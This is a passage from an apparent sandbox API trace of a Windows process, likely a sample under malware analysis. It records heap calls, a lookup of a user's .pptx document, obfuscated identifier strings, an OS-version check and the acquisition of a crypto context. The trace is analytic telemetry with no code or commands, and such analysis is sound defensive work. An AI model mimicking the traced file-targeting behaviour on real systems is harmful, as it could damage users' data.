| out: hHeap=0x25c0000) returned 1 [0264.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0264.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0264.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0264.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0264.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0264.102] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/MlLRhGX00a.pptx", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1df860, ftCreationTime.dwHighDateTime=0x1d4d233, ftLastAccessTime.dwLowDateTime=0xc26e6c10, ftLastAccessTime.dwHighDateTime=0x1d48f4c, ftLastWriteTime.dwLowDateTime=0xc26e6c10, ftLastWriteTime.dwHighDateTime=0x1d48f4c, nFileSizeHigh=0x0, nFileSizeLow=0xb424, dwReserved0=0xa5e0047, dwReserved1=0x26394, cFileName="MlLRhGX00a.pptx", cAlternateFileName="MLLRHG~1.PPT")) returned 0xaa5860 [0264.102] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0264.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0264.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0264.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0264.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0264.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0264.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0264.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.102] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0264.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0264.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0264.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0264.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0264.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0264.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0264.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0264.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0264.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0264.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0264.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0264.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0264.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0264.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0264.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0264.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0264.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0264.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0264.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0264.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0264.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0264.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0264.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0264.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0264.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0264.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.104] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.104] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0264.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0264.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.104] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0264.104] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0264.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0264.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0264.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0264.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0264.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.105] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0264.105] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.105] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0264.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0264.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.105] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0264.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0264.105] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0264.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0264.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0264.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0264.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0264.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0264.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.106] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0264.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0264.106] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0264.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0264.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0264.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0264.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0264.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0264.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0264.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0264.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0264.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0264.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.110] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0264.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0264.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.110] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0264.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0264.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0264.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0264.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0264.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0264.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0264.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0264.111] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.111] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.111] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0264.111] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.111] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0264.111] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.111] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.111] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.111] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.111] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.112] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.112] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0264.112] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0264.112] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.112] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.112] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0264.112] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.112] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0264.112] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0264.112] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0264.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0264.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0264.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0264.112] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2be8) returned 1 [0264.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0264.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0264.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0264.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0264.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0264.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0264.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0264.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0264.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0264.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0264.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0264.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0264.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0264.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0264.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0264.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0264.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0264.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0264.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0264.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0264.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0264.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0264.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0264.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0264.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0264.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0264.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0264.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0264.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0264.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0264.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0264.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0264.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0264.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0264.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0264.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0264.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0264.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0264.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0264.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0264.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0264.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0264.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0264.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0264.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0264.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0264.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0264.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0264.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0264.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0264.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0264.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0264.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0264.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0264.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0264.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0264.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0264.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0264.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0264.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0264.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0264.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0264.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0264.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 